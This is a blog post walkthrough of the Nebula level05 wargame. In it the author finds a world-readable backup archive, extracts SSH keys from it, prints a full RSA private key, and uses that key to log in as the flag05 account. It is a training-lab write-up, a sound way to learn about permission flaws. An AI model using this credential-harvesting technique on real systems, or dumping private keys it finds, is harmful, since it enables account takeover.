Post

Exploit Exercises: Nebula Level 05

Posted
By Lucian Nitescu 5 min read

Image of Nebula Terminal

Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level.

Solution

Of course we are going to login and go to the flag account folder, but we will be surprised to see this!

1
2
3
4
5
6
7
8
9
10

level05@nebula:/home/flag05$ ls -al
total 5
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05   675 May 18  2011 .profile
drwx------ 2 flag05 flag05    70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

Well under our flag folder we have nothing that we can use. Nada! Yet still we have our flag straight under your nose! The best hint for this challenge is “You are looking for weak directory permissions”. So if we run this command:

1
2
3
4
5
6
7
8

level05@nebula:/home/flag05$ ls -lAh
total 5.0K
drwxr-xr-x 2 flag05 flag05   42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05  220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3.3K May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05  675 May 18  2011 .profile
drwx------ 2 flag05 flag05   70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

Or just this:

1
2
3
4
5
6
7
8
9
10

level05@nebula:/home/flag05$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05   675 May 18  2011 .profile
drwx------ 2 flag05 flag05    70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

We will observe a hidden folder called “.backup” with the permissions drwxr-xr-x. All fine let’s see what is in it!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

level05@nebula:/home/flag05/.backup$ tar -xzvf backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
.ssh/id_rsa.pub
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa.pub: Cannot open: No such file or directory
.ssh/id_rsa
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa: Cannot open: No such file or directory
.ssh/authorized_keys
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/authorized_keys: Cannot open: No such file or directory
tar: Exiting with failure status due to previous errors
level05@nebula:/home/flag05/.backup$ ls -al
total 2
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 ..
-rw-rw-r-- 1 flag05 flag05  1826 Nov 20  2011 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$

Uuuuuuuuuuuu, permission denied at “tar -xzvf backup-19072011.tgz” command! Nope. Let’s move it to another folder that we control (~/ or /tmp) and let’s unzip the tgz.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~/
level05@nebula:/home/flag05/.backup$ cd ~/
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ ls -al
total 9
drwxr-x--- 1 level05 level05   80 Oct 18 12:43 .
drwxr-xr-x 1 root    root      80 Aug 27  2012 ..
-rw-r--r-- 1 level05 level05  220 May 18  2011 .bash_logout
-rw-r--r-- 1 level05 level05 3353 May 18  2011 .bashrc
drwx------ 2 level05 level05   60 Oct 18 12:27 .cache
-rw-r--r-- 1 level05 level05  675 May 18  2011 .profile
drwx------ 2 level05 level05    3 Aug 27  2012 .ssh
-rw-rw-r-- 1 level05 level05 1826 Oct 18 12:43 backup-19072011.tgz
level05@nebula:~$ mkdir ./test
level05@nebula:~$ tar -xvzf backup-19072011.tgz -C ./test
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$

Fun time. I’ve seen peoples trying to get the SSH key and to find the password in order to connect to the flag account in order to execute getflag to finish the task.

You could try this also if you want to waste your time on this task.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

level05@nebula:~/test/.ssh$ ls -al
total 12
drwxr-xr-x 2 level05 level05  100 Jul 19  2011 .
drwxrwxr-x 3 level05 level05   60 Oct 18 12:44 ..
-rw-r--r-- 1 level05 level05  394 Jul 19  2011 authorized_keys
-rw------- 1 level05 level05 1675 Jul 19  2011 id_rsa
-rw-r--r-- 1 level05 level05  394 Jul 19  2011 id_rsa.pub
level05@nebula:~/test/.ssh$ cat ./id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
vns4RR0HeVFpZMD2dhQQ76sXXK4Jph0/xVRgYytF1hsCJLiedJ3+aWyRMYtkgvZD
TDDD9lYGPzsb3FLqBocxCEpYJLruISY1YdzXpYgIBEVc8Sgq8Ur1uPMHAMYOL+b3
Hga2upWO7vBU9g91SLB6IMyje+2doO5NqmPNgNLzqsPNnv4eiFy46WMAbq9K5tP7
txhQdRxYZwMbhnJ+CLJ0EgXUAgdkvnjlGeD5okP61Eh7lbzHiws68SkflBvcw8KA
sMF6TSXoQECRgoi9ycwTZy4xWspUqij+sY+3EQIDAQABAoIBAAGir2w+/ufzs3Pm
xGKf5nc8rY0gSl5VnIeUyp1iWylmITcxifiO5ZUo9rZzgXXeWB37a2eC6V1Fya4c
7jaYx24FGzruXMYO9rfZzgLrbQAJL3YepcwnWGzTpJk90Kulv1zuGecHMk6ZcvGx
bRysutAKmIXwSR9oQ3BOOkyTKKtI6YeKSnUNU1KVO1t//ps2wFcfXRFb17prpokx
5clWwfUYRLBQlB4XjBIJ3tswpyC0PNOFfzoF+VeUlN9XZFrL0JWHX1F9DDOFJYL5
bXw7zwhjEvZ0/qOvZSJiH4lkbmANsBeMNY/JOGV6T7dWthKBGehCnupeADZVaSeo
Qlysa0ECgYEA6x4FwgpeqNtNGeCcSAUtoviTYMD5LfMEpY8t9eGdRpzw1CDlmG9x
k1LgzE3eA0qlJYx5NNqYEefIPVLdmSuSGS/5KqHeB8Ph7+WqLmguwIIIrfRJoPaD
ON2XqLU6YzAEazTrXnqALjOvP3qdN57xK0zoBAfYlkXJRgMYE1S23YsCgYEA3QhF
Fl11csPc2Yyz/7+9MG9JnOckYvuir+bf3fj/HEuIC9ylwXd4GfSLAW02Sg8DlfRh
M7MxCW9OEWtKgUtHe3fGc6/6X1yF7QfeAYZm8UX/fo6PxuX++mvfPxM4i6vRjgzB
Qy8WisqTK9nLZO+hEdPoVqalz0iUsvu2umz0CVMCgYAsNoUWrCSI1FR3XUmGMZMX
Zm8wbpltDpn9GCOobTjKIpEXEuiZ9bsB3T/wq2Poco0DtprEWabnFxMMlRyexRbA
LclJPw8lnqxKFIIgH+9KvCktrRZ7cl/SvbjbPNkx9cGe92Cbb6XTCl0WLtSJtRXc
8qVevKr59z2WMNbCK9gHaQKBgQDRaQNjpBohKFX2OytSU8uftuBMamV77iJ9e0SA
Hmc83IbBjkPwnwrHtHt6V4lG8yCXktgAznXYFX8mW7tT8gmAfcMkWgbhEFzGbFy2
nyqqzoG42sJ3U/KWOVtifAhns9qvNYBo8ZTu2+xBcHAWaj31EQqgBfU0BPT0+ixu
RcmThwKBgAi0ej7ylHhtwODQGghRmDpxEx9deJ0jilM2EnqIecJj5jnPW8BKDgV4
Dc1QljBeCQ1r30DGYmOIazbhm+orm4df6HWPayRhNBlkmulqTs5GHvLMPjcKMB0k
0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr
-----END RSA PRIVATE KEY-----
level05@nebula:~/test/.ssh$

Or, you could also think that the .tgz file is called backup, so it might be the backup of this system and that it could also store the keys and passwords for ssh. In other smart words:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

level05@nebula:~/test/.ssh$ cp id_rsa /home/level05/.ssh/
level05@nebula:~/test/.ssh$ ssh flag05@192.168.0.101

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
flag05@nebula:~$

Yes we do not need any password at all, just the private key of the SSH as the system knows already the system as a trusted one. Keep in mind: Be lazy!

nebula, writeups
nebula writeups level exploit exercise tutorial solution
This post is licensed under CC BY 4.0 by the author.